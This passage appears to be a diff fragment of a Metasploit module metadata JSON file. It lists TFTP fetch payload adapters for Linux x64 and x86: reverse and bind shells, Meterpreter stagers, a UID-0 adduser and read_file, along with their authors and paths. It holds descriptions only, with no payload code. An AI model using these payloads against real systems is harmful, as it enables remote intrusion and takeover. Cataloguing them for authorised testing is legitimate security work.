attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": 
"linux/x64/reverse_sctp" - }, - "payload_cmd/linux/tftp/x64/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/tftp/x64/shell_bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_ipv6_tcp", - "check": false, 
- "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_bind_tcp_random_port": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Geyslan G. 
Bem " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_find_port", - "staged": false - }, - 
"payload_cmd/linux/tftp/x64/shell_reverse_ipv6_tcp": { - "name": "TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/adduser": { - "name": "TFTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/tftp/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/tftp/x86/chmod": { - "name": "TFTP Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/tftp/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/tftp/x86/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/tftp/x86/generic/debug_trap": { - "name": "TFTP Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/tftp/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, 
- "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/tftp/x86/generic/tight_loop": { - "name": "TFTP Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/tftp/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp": { - "name": "TFTP Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 
connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": 
"linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - 
"is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter/find_tag": { - "name": "TFTP Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer 
McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/find_tag", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - 
"stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - 
"Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/x86/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/metsvc_bind_tcp": { - "name": "TFTP Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/tftp/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/metsvc_reverse_tcp": { - "name": "TFTP 
Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/read_file": { - "name": "TFTP Fetch, Linux Read File", - "fullname": "payload/cmd/linux/tftp/x86/read_file", - "aliases": [], - "rank": 